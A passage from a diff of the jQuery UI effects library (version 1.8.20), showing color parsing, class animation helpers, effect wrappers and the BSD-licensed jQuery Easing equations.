if ( color != '' && color != 'transparent' || $.nodeName(elem, "body") )
|
4022 |
+
break;
|
4023 |
+
|
4024 |
+
attr = "backgroundColor";
|
4025 |
+
} while ( elem = elem.parentNode );
|
4026 |
+
|
4027 |
+
return getRGB(color);
|
4028 |
+
};
|
4029 |
+
|
4030 |
+
// Some named colors to work with
|
4031 |
+
// From Interface by Stefan Petre
|
4032 |
+
// http://interface.eyecon.ro/
|
4033 |
+
|
4034 |
+
var colors = {
|
4035 |
+
aqua:[0,255,255],
|
4036 |
+
azure:[240,255,255],
|
4037 |
+
beige:[245,245,220],
|
4038 |
+
black:[0,0,0],
|
4039 |
+
blue:[0,0,255],
|
4040 |
+
brown:[165,42,42],
|
4041 |
+
cyan:[0,255,255],
|
4042 |
+
darkblue:[0,0,139],
|
4043 |
+
darkcyan:[0,139,139],
|
4044 |
+
darkgrey:[169,169,169],
|
4045 |
+
darkgreen:[0,100,0],
|
4046 |
+
darkkhaki:[189,183,107],
|
4047 |
+
darkmagenta:[139,0,139],
|
4048 |
+
darkolivegreen:[85,107,47],
|
4049 |
+
darkorange:[255,140,0],
|
4050 |
+
darkorchid:[153,50,204],
|
4051 |
+
darkred:[139,0,0],
|
4052 |
+
darksalmon:[233,150,122],
|
4053 |
+
darkviolet:[148,0,211],
|
4054 |
+
fuchsia:[255,0,255],
|
4055 |
+
gold:[255,215,0],
|
4056 |
+
green:[0,128,0],
|
4057 |
+
indigo:[75,0,130],
|
4058 |
+
khaki:[240,230,140],
|
4059 |
+
lightblue:[173,216,230],
|
4060 |
+
lightcyan:[224,255,255],
|
4061 |
+
lightgreen:[144,238,144],
|
4062 |
+
lightgrey:[211,211,211],
|
4063 |
+
lightpink:[255,182,193],
|
4064 |
+
lightyellow:[255,255,224],
|
4065 |
+
lime:[0,255,0],
|
4066 |
+
magenta:[255,0,255],
|
4067 |
+
maroon:[128,0,0],
|
4068 |
+
navy:[0,0,128],
|
4069 |
+
olive:[128,128,0],
|
4070 |
+
orange:[255,165,0],
|
4071 |
+
pink:[255,192,203],
|
4072 |
+
purple:[128,0,128],
|
4073 |
+
violet:[128,0,128],
|
4074 |
+
red:[255,0,0],
|
4075 |
+
silver:[192,192,192],
|
4076 |
+
white:[255,255,255],
|
4077 |
+
yellow:[255,255,0],
|
4078 |
+
transparent: [255,255,255]
|
4079 |
+
};
|
4080 |
+
|
4081 |
+
|
4082 |
+
|
4083 |
+
/******************************************************************************/
|
4084 |
+
/****************************** CLASS ANIMATIONS ******************************/
|
4085 |
+
/******************************************************************************/
|
4086 |
+
|
4087 |
+
var classAnimationActions = ['add', 'remove', 'toggle'],
|
4088 |
+
shorthandStyles = {
|
4089 |
+
border: 1,
|
4090 |
+
borderBottom: 1,
|
4091 |
+
borderColor: 1,
|
4092 |
+
borderLeft: 1,
|
4093 |
+
borderRight: 1,
|
4094 |
+
borderTop: 1,
|
4095 |
+
borderWidth: 1,
|
4096 |
+
margin: 1,
|
4097 |
+
padding: 1
|
4098 |
+
};
|
4099 |
+
|
4100 |
+
function getElementStyles() {
|
4101 |
+
var style = document.defaultView
|
4102 |
+
? document.defaultView.getComputedStyle(this, null)
|
4103 |
+
: this.currentStyle,
|
4104 |
+
newStyle = {},
|
4105 |
+
key,
|
4106 |
+
camelCase;
|
4107 |
+
|
4108 |
+
// webkit enumerates style porperties
|
4109 |
+
if (style && style.length && style[0] && style[style[0]]) {
|
4110 |
+
var len = style.length;
|
4111 |
+
while (len--) {
|
4112 |
+
key = style[len];
|
4113 |
+
if (typeof style[key] == 'string') {
|
4114 |
+
camelCase = key.replace(/\-(\w)/g, function(all, letter){
|
4115 |
+
return letter.toUpperCase();
|
4116 |
+
});
|
4117 |
+
newStyle[camelCase] = style[key];
|
4118 |
+
}
|
4119 |
+
}
|
4120 |
+
} else {
|
4121 |
+
for (key in style) {
|
4122 |
+
if (typeof style[key] === 'string') {
|
4123 |
+
newStyle[key] = style[key];
|
4124 |
+
}
|
4125 |
+
}
|
4126 |
+
}
|
4127 |
+
|
4128 |
+
return newStyle;
|
4129 |
+
}
|
4130 |
+
|
4131 |
+
function filterStyles(styles) {
|
4132 |
+
var name, value;
|
4133 |
+
for (name in styles) {
|
4134 |
+
value = styles[name];
|
4135 |
+
if (
|
4136 |
+
// ignore null and undefined values
|
4137 |
+
value == null ||
|
4138 |
+
// ignore functions (when does this occur?)
|
4139 |
+
$.isFunction(value) ||
|
4140 |
+
// shorthand styles that need to be expanded
|
4141 |
+
name in shorthandStyles ||
|
4142 |
+
// ignore scrollbars (break in IE)
|
4143 |
+
(/scrollbar/).test(name) ||
|
4144 |
+
|
4145 |
+
// only colors or values that can be converted to numbers
|
4146 |
+
(!(/color/i).test(name) && isNaN(parseFloat(value)))
|
4147 |
+
) {
|
4148 |
+
delete styles[name];
|
4149 |
+
}
|
4150 |
+
}
|
4151 |
+
|
4152 |
+
return styles;
|
4153 |
+
}
|
4154 |
+
|
4155 |
+
function styleDifference(oldStyle, newStyle) {
|
4156 |
+
var diff = { _: 0 }, // http://dev.jquery.com/ticket/5459
|
4157 |
+
name;
|
4158 |
+
|
4159 |
+
for (name in newStyle) {
|
4160 |
+
if (oldStyle[name] != newStyle[name]) {
|
4161 |
+
diff[name] = newStyle[name];
|
4162 |
+
}
|
4163 |
+
}
|
4164 |
+
|
4165 |
+
return diff;
|
4166 |
+
}
|
4167 |
+
|
4168 |
+
$.effects.animateClass = function(value, duration, easing, callback) {
|
4169 |
+
if ($.isFunction(easing)) {
|
4170 |
+
callback = easing;
|
4171 |
+
easing = null;
|
4172 |
+
}
|
4173 |
+
|
4174 |
+
return this.queue(function() {
|
4175 |
+
var that = $(this),
|
4176 |
+
originalStyleAttr = that.attr('style') || ' ',
|
4177 |
+
originalStyle = filterStyles(getElementStyles.call(this)),
|
4178 |
+
newStyle,
|
4179 |
+
className = that.attr('class') || "";
|
4180 |
+
|
4181 |
+
$.each(classAnimationActions, function(i, action) {
|
4182 |
+
if (value[action]) {
|
4183 |
+
that[action + 'Class'](value[action]);
|
4184 |
+
}
|
4185 |
+
});
|
4186 |
+
newStyle = filterStyles(getElementStyles.call(this));
|
4187 |
+
that.attr('class', className);
|
4188 |
+
|
4189 |
+
that.animate(styleDifference(originalStyle, newStyle), {
|
4190 |
+
queue: false,
|
4191 |
+
duration: duration,
|
4192 |
+
easing: easing,
|
4193 |
+
complete: function() {
|
4194 |
+
$.each(classAnimationActions, function(i, action) {
|
4195 |
+
if (value[action]) { that[action + 'Class'](value[action]); }
|
4196 |
+
});
|
4197 |
+
// work around bug in IE by clearing the cssText before setting it
|
4198 |
+
if (typeof that.attr('style') == 'object') {
|
4199 |
+
that.attr('style').cssText = '';
|
4200 |
+
that.attr('style').cssText = originalStyleAttr;
|
4201 |
+
} else {
|
4202 |
+
that.attr('style', originalStyleAttr);
|
4203 |
+
}
|
4204 |
+
if (callback) { callback.apply(this, arguments); }
|
4205 |
+
$.dequeue( this );
|
4206 |
+
}
|
4207 |
+
});
|
4208 |
+
});
|
4209 |
+
};
|
4210 |
+
|
4211 |
+
$.fn.extend({
|
4212 |
+
_addClass: $.fn.addClass,
|
4213 |
+
addClass: function(classNames, speed, easing, callback) {
|
4214 |
+
return speed ? $.effects.animateClass.apply(this, [{ add: classNames },speed,easing,callback]) : this._addClass(classNames);
|
4215 |
+
},
|
4216 |
+
|
4217 |
+
_removeClass: $.fn.removeClass,
|
4218 |
+
removeClass: function(classNames,speed,easing,callback) {
|
4219 |
+
return speed ? $.effects.animateClass.apply(this, [{ remove: classNames },speed,easing,callback]) : this._removeClass(classNames);
|
4220 |
+
},
|
4221 |
+
|
4222 |
+
_toggleClass: $.fn.toggleClass,
|
4223 |
+
toggleClass: function(classNames, force, speed, easing, callback) {
|
4224 |
+
if ( typeof force == "boolean" || force === undefined ) {
|
4225 |
+
if ( !speed ) {
|
4226 |
+
// without speed parameter;
|
4227 |
+
return this._toggleClass(classNames, force);
|
4228 |
+
} else {
|
4229 |
+
return $.effects.animateClass.apply(this, [(force?{add:classNames}:{remove:classNames}),speed,easing,callback]);
|
4230 |
+
}
|
4231 |
+
} else {
|
4232 |
+
// without switch parameter;
|
4233 |
+
return $.effects.animateClass.apply(this, [{ toggle: classNames },force,speed,easing]);
|
4234 |
+
}
|
4235 |
+
},
|
4236 |
+
|
4237 |
+
switchClass: function(remove,add,speed,easing,callback) {
|
4238 |
+
return $.effects.animateClass.apply(this, [{ add: add, remove: remove },speed,easing,callback]);
|
4239 |
+
}
|
4240 |
+
});
|
4241 |
+
|
4242 |
+
|
4243 |
+
|
4244 |
+
/******************************************************************************/
|
4245 |
+
/*********************************** EFFECTS **********************************/
|
4246 |
+
/******************************************************************************/
|
4247 |
+
|
4248 |
+
$.extend($.effects, {
|
4249 |
+
version: "1.8.20",
|
4250 |
+
|
4251 |
+
// Saves a set of properties in a data storage
|
4252 |
+
save: function(element, set) {
|
4253 |
+
for(var i=0; i < set.length; i++) {
|
4254 |
+
if(set[i] !== null) element.data("ec.storage."+set[i], element[0].style[set[i]]);
|
4255 |
+
}
|
4256 |
+
},
|
4257 |
+
|
4258 |
+
// Restores a set of previously saved properties from a data storage
|
4259 |
+
restore: function(element, set) {
|
4260 |
+
for(var i=0; i < set.length; i++) {
|
4261 |
+
if(set[i] !== null) element.css(set[i], element.data("ec.storage."+set[i]));
|
4262 |
+
}
|
4263 |
+
},
|
4264 |
+
|
4265 |
+
setMode: function(el, mode) {
|
4266 |
+
if (mode == 'toggle') mode = el.is(':hidden') ? 'show' : 'hide'; // Set for toggle
|
4267 |
+
return mode;
|
4268 |
+
},
|
4269 |
+
|
4270 |
+
getBaseline: function(origin, original) { // Translates a [top,left] array into a baseline value
|
4271 |
+
// this should be a little more flexible in the future to handle a string & hash
|
4272 |
+
var y, x;
|
4273 |
+
switch (origin[0]) {
|
4274 |
+
case 'top': y = 0; break;
|
4275 |
+
case 'middle': y = 0.5; break;
|
4276 |
+
case 'bottom': y = 1; break;
|
4277 |
+
default: y = origin[0] / original.height;
|
4278 |
+
};
|
4279 |
+
switch (origin[1]) {
|
4280 |
+
case 'left': x = 0; break;
|
4281 |
+
case 'center': x = 0.5; break;
|
4282 |
+
case 'right': x = 1; break;
|
4283 |
+
default: x = origin[1] / original.width;
|
4284 |
+
};
|
4285 |
+
return {x: x, y: y};
|
4286 |
+
},
|
4287 |
+
|
4288 |
+
// Wraps the element around a wrapper that copies position properties
|
4289 |
+
createWrapper: function(element) {
|
4290 |
+
|
4291 |
+
// if the element is already wrapped, return it
|
4292 |
+
if (element.parent().is('.ui-effects-wrapper')) {
|
4293 |
+
return element.parent();
|
4294 |
+
}
|
4295 |
+
|
4296 |
+
// wrap the element
|
4297 |
+
var props = {
|
4298 |
+
width: element.outerWidth(true),
|
4299 |
+
height: element.outerHeight(true),
|
4300 |
+
'float': element.css('float')
|
4301 |
+
},
|
4302 |
+
wrapper = $('<div></div>')
|
4303 |
+
.addClass('ui-effects-wrapper')
|
4304 |
+
.css({
|
4305 |
+
fontSize: '100%',
|
4306 |
+
background: 'transparent',
|
4307 |
+
border: 'none',
|
4308 |
+
margin: 0,
|
4309 |
+
padding: 0
|
4310 |
+
}),
|
4311 |
+
active = document.activeElement;
|
4312 |
+
|
4313 |
+
element.wrap(wrapper);
|
4314 |
+
|
4315 |
+
// Fixes #7595 - Elements lose focus when wrapped.
|
4316 |
+
if ( element[ 0 ] === active || $.contains( element[ 0 ], active ) ) {
|
4317 |
+
$( active ).focus();
|
4318 |
+
}
|
4319 |
+
|
4320 |
+
wrapper = element.parent(); //Hotfix for jQuery 1.4 since some change in wrap() seems to actually loose the reference to the wrapped element
|
4321 |
+
|
4322 |
+
// transfer positioning properties to the wrapper
|
4323 |
+
if (element.css('position') == 'static') {
|
4324 |
+
wrapper.css({ position: 'relative' });
|
4325 |
+
element.css({ position: 'relative' });
|
4326 |
+
} else {
|
4327 |
+
$.extend(props, {
|
4328 |
+
position: element.css('position'),
|
4329 |
+
zIndex: element.css('z-index')
|
4330 |
+
});
|
4331 |
+
$.each(['top', 'left', 'bottom', 'right'], function(i, pos) {
|
4332 |
+
props[pos] = element.css(pos);
|
4333 |
+
if (isNaN(parseInt(props[pos], 10))) {
|
4334 |
+
props[pos] = 'auto';
|
4335 |
+
}
|
4336 |
+
});
|
4337 |
+
element.css({position: 'relative', top: 0, left: 0, right: 'auto', bottom: 'auto' });
|
4338 |
+
}
|
4339 |
+
|
4340 |
+
return wrapper.css(props).show();
|
4341 |
+
},
|
4342 |
+
|
4343 |
+
removeWrapper: function(element) {
|
4344 |
+
var parent,
|
4345 |
+
active = document.activeElement;
|
4346 |
+
|
4347 |
+
if (element.parent().is('.ui-effects-wrapper')) {
|
4348 |
+
parent = element.parent().replaceWith(element);
|
4349 |
+
// Fixes #7595 - Elements lose focus when wrapped.
|
4350 |
+
if ( element[ 0 ] === active || $.contains( element[ 0 ], active ) ) {
|
4351 |
+
$( active ).focus();
|
4352 |
+
}
|
4353 |
+
return parent;
|
4354 |
+
}
|
4355 |
+
|
4356 |
+
return element;
|
4357 |
+
},
|
4358 |
+
|
4359 |
+
setTransition: function(element, list, factor, value) {
|
4360 |
+
value = value || {};
|
4361 |
+
$.each(list, function(i, x){
|
4362 |
+
var unit = element.cssUnit(x);
|
4363 |
+
if (unit[0] > 0) value[x] = unit[0] * factor + unit[1];
|
4364 |
+
});
|
4365 |
+
return value;
|
4366 |
+
}
|
4367 |
+
});
|
4368 |
+
|
4369 |
+
|
4370 |
+
function _normalizeArguments(effect, options, speed, callback) {
|
4371 |
+
// shift params for method overloading
|
4372 |
+
if (typeof effect == 'object') {
|
4373 |
+
callback = options;
|
4374 |
+
speed = null;
|
4375 |
+
options = effect;
|
4376 |
+
effect = options.effect;
|
4377 |
+
}
|
4378 |
+
if ($.isFunction(options)) {
|
4379 |
+
callback = options;
|
4380 |
+
speed = null;
|
4381 |
+
options = {};
|
4382 |
+
}
|
4383 |
+
if (typeof options == 'number' || $.fx.speeds[options]) {
|
4384 |
+
callback = speed;
|
4385 |
+
speed = options;
|
4386 |
+
options = {};
|
4387 |
+
}
|
4388 |
+
if ($.isFunction(speed)) {
|
4389 |
+
callback = speed;
|
4390 |
+
speed = null;
|
4391 |
+
}
|
4392 |
+
|
4393 |
+
options = options || {};
|
4394 |
+
|
4395 |
+
speed = speed || options.duration;
|
4396 |
+
speed = $.fx.off ? 0 : typeof speed == 'number'
|
4397 |
+
? speed : speed in $.fx.speeds ? $.fx.speeds[speed] : $.fx.speeds._default;
|
4398 |
+
|
4399 |
+
callback = callback || options.complete;
|
4400 |
+
|
4401 |
+
return [effect, options, speed, callback];
|
4402 |
+
}
|
4403 |
+
|
4404 |
+
function standardSpeed( speed ) {
|
4405 |
+
// valid standard speeds
|
4406 |
+
if ( !speed || typeof speed === "number" || $.fx.speeds[ speed ] ) {
|
4407 |
+
return true;
|
4408 |
+
}
|
4409 |
+
|
4410 |
+
// invalid strings - treat as "normal" speed
|
4411 |
+
if ( typeof speed === "string" && !$.effects[ speed ] ) {
|
4412 |
+
return true;
|
4413 |
+
}
|
4414 |
+
|
4415 |
+
return false;
|
4416 |
+
}
|
4417 |
+
|
4418 |
+
$.fn.extend({
|
4419 |
+
effect: function(effect, options, speed, callback) {
|
4420 |
+
var args = _normalizeArguments.apply(this, arguments),
|
4421 |
+
// TODO: make effects take actual parameters instead of a hash
|
4422 |
+
args2 = {
|
4423 |
+
options: args[1],
|
4424 |
+
duration: args[2],
|
4425 |
+
callback: args[3]
|
4426 |
+
},
|
4427 |
+
mode = args2.options.mode,
|
4428 |
+
effectMethod = $.effects[effect];
|
4429 |
+
|
4430 |
+
if ( $.fx.off || !effectMethod ) {
|
4431 |
+
// delegate to the original method (e.g., .show()) if possible
|
4432 |
+
if ( mode ) {
|
4433 |
+
return this[ mode ]( args2.duration, args2.callback );
|
4434 |
+
} else {
|
4435 |
+
return this.each(function() {
|
4436 |
+
if ( args2.callback ) {
|
4437 |
+
args2.callback.call( this );
|
4438 |
+
}
|
4439 |
+
});
|
4440 |
+
}
|
4441 |
+
}
|
4442 |
+
|
4443 |
+
return effectMethod.call(this, args2);
|
4444 |
+
},
|
4445 |
+
|
4446 |
+
_show: $.fn.show,
|
4447 |
+
show: function(speed) {
|
4448 |
+
if ( standardSpeed( speed ) ) {
|
4449 |
+
return this._show.apply(this, arguments);
|
4450 |
+
} else {
|
4451 |
+
var args = _normalizeArguments.apply(this, arguments);
|
4452 |
+
args[1].mode = 'show';
|
4453 |
+
return this.effect.apply(this, args);
|
4454 |
+
}
|
4455 |
+
},
|
4456 |
+
|
4457 |
+
_hide: $.fn.hide,
|
4458 |
+
hide: function(speed) {
|
4459 |
+
if ( standardSpeed( speed ) ) {
|
4460 |
+
return this._hide.apply(this, arguments);
|
4461 |
+
} else {
|
4462 |
+
var args = _normalizeArguments.apply(this, arguments);
|
4463 |
+
args[1].mode = 'hide';
|
4464 |
+
return this.effect.apply(this, args);
|
4465 |
+
}
|
4466 |
+
},
|
4467 |
+
|
4468 |
+
// jQuery core overloads toggle and creates _toggle
|
4469 |
+
__toggle: $.fn.toggle,
|
4470 |
+
toggle: function(speed) {
|
4471 |
+
if ( standardSpeed( speed ) || typeof speed === "boolean" || $.isFunction( speed ) ) {
|
4472 |
+
return this.__toggle.apply(this, arguments);
|
4473 |
+
} else {
|
4474 |
+
var args = _normalizeArguments.apply(this, arguments);
|
4475 |
+
args[1].mode = 'toggle';
|
4476 |
+
return this.effect.apply(this, args);
|
4477 |
+
}
|
4478 |
+
},
|
4479 |
+
|
4480 |
+
// helper functions
|
4481 |
+
cssUnit: function(key) {
|
4482 |
+
var style = this.css(key), val = [];
|
4483 |
+
$.each( ['em','px','%','pt'], function(i, unit){
|
4484 |
+
if(style.indexOf(unit) > 0)
|
4485 |
+
val = [parseFloat(style), unit];
|
4486 |
+
});
|
4487 |
+
return val;
|
4488 |
+
}
|
4489 |
+
});
|
4490 |
+
|
4491 |
+
|
4492 |
+
|
4493 |
+
/******************************************************************************/
|
4494 |
+
/*********************************** EASING ***********************************/
|
4495 |
+
/******************************************************************************/
|
4496 |
+
|
4497 |
+
/*
|
4498 |
+
* jQuery Easing v1.3 - http://gsgd.co.uk/sandbox/jquery/easing/
|
4499 |
+
*
|
4500 |
+
* Uses the built in easing capabilities added In jQuery 1.1
|
4501 |
+
* to offer multiple easing options
|
4502 |
+
*
|
4503 |
+
* TERMS OF USE - jQuery Easing
|
4504 |
+
*
|
4505 |
+
* Open source under the BSD License.
|
4506 |
+
*
|
4507 |
+
* Copyright 2008 George McGinley Smith
|
4508 |
+
* All rights reserved.
|
4509 |
+
*
|
4510 |
+
* Redistribution and use in source and binary forms, with or without modification,
|
4511 |
+
* are permitted provided that the following conditions are met:
|
4512 |
+
*
|
4513 |
+
* Redistributions of source code must retain the above copyright notice, this list of
|
4514 |
+
* conditions and the following disclaimer.
|
4515 |
+
* Redistributions in binary form must reproduce the above copyright notice, this list
|
4516 |
+
* of conditions and the following disclaimer in the documentation and/or other materials
|
4517 |
+
* provided with the distribution.
|
4518 |
+
*
|
4519 |
+
* Neither the name of the author nor the names of contributors may be used to endorse
|
4520 |
+
* or promote products derived from this software without specific prior written permission.
|
4521 |
+
*
|
4522 |
+
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY
|
4523 |
+
* EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
|
4524 |
+
* MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
|
4525 |
+
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
|
4526 |
+
* EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
|
4527 |
+
* GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
|
4528 |
+
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
|
4529 |
+
* NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
|
4530 |
+
* OF THE POSSIBILITY OF SUCH DAMAGE.
|
4531 |
+
*
|
4532 |
+
*/
|
4533 |
+
|
4534 |
+
// t: current time, b: begInnIng value, c: change In value, d: duration
|
4535 |
+
$.easing.jswing = $.easing.swing;
|
4536 |
+
|
4537 |
+
$.extend($.easing,
|
4538 |
+
{
|
4539 |
+
def: 'easeOutQuad',
|
4540 |
+
swing: function (x, t, b, c, d) {
|
4541 |
+
//alert($.easing.default);
|
4542 |
+
return $.easing[$.easing.def](x, t, b, c, d);
|
4543 |
+
},
|
4544 |
+
easeInQuad: function (x, t, b, c, d) {
|
4545 |
+
return c*(t/=d)*t + b;
|
4546 |
+
},
|
4547 |
+
easeOutQuad: function (x, t, b, c, d) {
|
4548 |
+
return -c *(t/=d)*(t-2) + b;
|
4549 |
+
},
|
4550 |
+
easeInOutQuad: function (x, t, b, c, d) {
|
4551 |
+
if ((t/=d/2) < 1) return c/2*t*t + b;
|
4552 |
+
return -c/2 * ((--t)*(t-2) - 1) + b;
|
4553 |
+
},
|
4554 |
+
easeInCubic: function (x, t, b, c, d) {
|
4555 |
+
return c*(t/=d)*t*t + b;
|
4556 |
+
},
|
4557 |
+
easeOutCubic: function (x, t, b, c, d) {
|
4558 |
+
return c*((t=t/d-1)*t*t + 1) + b;
|
4559 |
+
},
|
4560 |
+
easeInOutCubic: function (x, t, b, c, d) {
|
4561 |
+
if ((t/=d/2) < 1) return c/2*t*t*t + b;
|
4562 |
+
return c/2*((t-=2)*t*t + 2) + b;
|
4563 |
+
},
|
4564 |
+
easeInQuart: function (x, t, b, c, d) {
|
4565 |
+
return c*(t/=d)*t*t*t + b;
|
4566 |
+
},
|
4567 |
+
easeOutQuart: function (x, t, b, c, d) {
|
4568 |
+
return -c * ((t=t/d-1)*t*t*t - 1) + b;
|
4569 |
+
},
|
4570 |
+
easeInOutQuart: function (x, t, b, c, d) {
|
4571 |
+
if ((t/=d/2) < 1) return c/2*t*t*t*t + b;
|
4572 |
+
return -c/2 * ((t-=2)*t*t*t - 2) + b;
|
4573 |
+
},
|
4574 |
+
easeInQuint: function (x, t, b, c, d) {
|
4575 |
+
return c*(t/=d)*t*t*t*t + b;
|
4576 |
+
},
|
4577 |
+
easeOutQuint: function (x, t, b, c, d) {
|
4578 |
+
return c*((t=t/d-1)*t*t*t*t + 1) + b;
|
4579 |
+
},
|
4580 |
+
easeInOutQuint: function (x, t, b, c, d) {
|
4581 |
+
if ((t/=d/2) < 1) return c/2*t*t*t*t*t + b;
|
4582 |
+
return c/2*((t-=2)*t*t*t*t + 2) + b;
|
4583 |
+
},
|
4584 |
+
easeInSine: function (x, t, b, c, d) {
|
4585 |
+
return -c * Math.cos(t/d * (Math.PI/2)) + c + b;
|
4586 |
+
},
|
4587 |
+
easeOutSine: function (x, t, b, c, d) {
|
4588 |
+
return c * Math.sin(t/d * (Math.PI/2)) + b;
|
4589 |
+
},
|
4590 |
+
easeInOutSine: function (x, t, b, c, d) {
|
4591 |
+
return -c/2 * (Math.cos(Math.PI*t/d) - 1) + b;
|
4592 |
+
},
|
4593 |
+
easeInExpo: function (x, t, b, c, d) {
|
4594 |
+
return (t==0) ? b : c * Math.pow(2, 10 * (t/d - 1)) + b;
|
4595 |
+
},
|
4596 |
+
easeOutExpo: function (x, t, b, c, d) {
|
4597 |
+
return (t==d) ? b+c : c * (-Math.pow(2, -10 * t/d) + 1) + b;
|
4598 |
+
},
|
4599 |
+
easeInOutExpo: function (x, t, b, c, d) {
|
4600 |
+
if (t==0) return b;
|
4601 |
+
if (t==d) return b+c;
|
4602 |
+
if ((t/=d/2) < 1) return c/2 * Math.pow(2, 10 * (t - 1)) + b;
|
4603 |
+
return c/2 * (-Math.pow(2, -10 * --t) + 2) + b;
|
4604 |
+
},
|
4605 |
+
easeInCirc: function (x, t, b, c, d) {
|
4606 |
+
return -c * (Math.sqrt(1 - (t/=d)*t) - 1) + b;
|
4607 |
+
},
|
4608 |
+
easeOutCirc: function (x, t, b, c, d) {
|
4609 |
+
return c * Math.sqrt(1 - (t=t/d-1)*t) + b;
|
4610 |
+
},
|
4611 |
+
easeInOutCirc: function (x, t, b, c, d) {
|
4612 |
+
if ((t/=d/2) < 1) return -c/2 * (Math.sqrt(1 - t*t) - 1) + b;
|
4613 |
+
return c/2 * (Math.sqrt(1 - (t-=2)*t) + 1) + b;
|
4614 |
+
},
|
4615 |
+
easeInElastic: function (x, t, b, c, d) {
|
4616 |
+
var s=1.70158;var p=0;var a=c;
|
4617 |
+
if (t==0) return b; if ((t/=d)==1) return b+c; if (!p) p=d*.3;
|
4618 |
+
if (a < Math.abs(c)) { a=c; var s=p/4; }
|
4619 |
+
else var s = p/(2*Math.PI) * Math.asin (c/a);
|
4620 |
+
return -(a*Math.pow(2,10*(t-=1)) * Math.sin( (t*d-s)*(2*Math.PI)/p )) + b;
|
4621 |
+
},
|
4622 |
+
easeOutElastic: function (x, t, b, c, d) {
|
4623 |
+
var s=1.70158;var p=0;var a=c;
|
4624 |
+
if (t==0) return b; if ((t/=d)==1) return b+c; if (!p) p=d*.3;
|
4625 |
+
if (a < Math.abs(c)) { a=c; var s=p/4; }
|
4626 |
+
else var s = p/(2*Math.PI) * Math.asin (c/a);
|
4627 |
+
return a*Math.pow(2,-10*t) * Math.sin( (t*d-s)*(2*Math.PI)/p ) + c + b;
|
4628 |
+
},
|
4629 |
+
easeInOutElastic: function (x, t, b, c, d) {
|
4630 |
+
var s=1.70158;var p=0;var a=c;
|
4631 |
+
if (t==0) return b; if ((t/=d/2)==2) return b+c; if (!p) p=d*(.3*1.5);
|
4632 |
+
if (a < Math.abs(c)) { a=c; var s=p/4; }
|
4633 |
+
else var s = p/(2*Math.PI) * Math.asin (c/a);
|
4634 |
+
if (t < 1) return -.5*(a*Math.pow(2,10*(t-=1)) * Math.sin( (t*d-s)*(2*Math.PI)/p )) + b;
|
4635 |
+
return a*Math.pow(2,-10*(t-=1)) * Math.sin( (t*d-s)*(2*Math.PI)/p )*.5 + c + b;
|
4636 |
+
},
|
4637 |
+
easeInBack: function (x, t, b, c, d, s) {
|
4638 |
+
if (s == undefined) s = 1.70158;
|
4639 |
+
return c*(t/=d)*t*((s+1)*t - s) + b;
|
4640 |
+
},
|
4641 |
+
easeOutBack: function (x, t, b, c, d, s) {
|
4642 |
+
if (s == undefined) s = 1.70158;
|
4643 |
+
return c*((t=t/d-1)*t*((s+1)*t + s) + 1) + b;
|
4644 |
+
},
|
4645 |
+
easeInOutBack: function (x, t, b, c, d, s) {
|
4646 |
+
if (s == undefined) s = 1.70158;
|
4647 |
+
if ((t/=d/2) < 1) return c/2*(t*t*(((s*=(1.525))+1)*t - s)) + b;
|
4648 |
+
return c/2*((t-=2)*t*(((s*=(1.525))+1)*t + s) + 2) + b;
|
4649 |
+
},
|
4650 |
+
easeInBounce: function (x, t, b, c, d) {
|
4651 |
+
return c - $.easing.easeOutBounce (x, d-t, 0, c, d) + b;
|
4652 |
+
},
|
4653 |
+
easeOutBounce: function (x, t, b, c, d) {
|
4654 |
+
if ((t/=d) < (1/2.75)) {
|
4655 |
+
return c*(7.5625*t*t) + b;
|
4656 |
+
} else if (t < (2/2.75)) {
|
4657 |
+
return c*(7.5625*(t-=(1.5/2.75))*t + .75) + b;
|
4658 |
+
} else if (t < (2.5/2.75)) {
|
4659 |
+
return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b;
|
4660 |
+
} else {
|
4661 |
+
return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b;
|
4662 |
+
}
|
4663 |
+
},
|
4664 |
+
easeInOutBounce: function (x, t, b, c, d) {
|
4665 |
+
if (t < d/2) return $.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b;
|
4666 |
+
return $.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b;
|
4667 |
+
}
|
4668 |
+
});
|
4669 |
+
|
4670 |
+
/*
|
4671 |
+
*
|
4672 |
+
* TERMS OF USE - EASING EQUATIONS
|
4673 |
+
*
|
4674 |
+
* Open source under the BSD License.
|
4675 |
+
*
|
4676 |
+
* Copyright 2001 Robert Penner
|
4677 |
+
* All rights reserved.
|
4678 |
+
*
|
4679 |
+
* Redistribution and use in source and binary forms, with or without modification,
|
4680 |
+
* are permitted provided that the following conditions are met:
|
4681 |
+
*
|
4682 |
+
* Redistributions of source code must retain the above copyright notice, this list of
|
4683 |
+
* conditions and the following disclaimer.
|
4684 |
+
* Redistributions in binary form must reproduce the above copyright notice, this list
|
4685 |
+
* of conditions and the following disclaimer in the documentation and/or other materials
|
4686 |
+
* provided with the distribution.
|
4687 |
+
*
|
4688 |
+
* Neither the name of the author nor the names of contributors may be used to endorse
|
4689 |
+
* or promote products derived from this software without specific prior written permission.
|
4690 |
+
*
|
4691 |
+
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY
|
4692 |
+
* EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
|
4693 |
+
* MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
|
4694 |
+
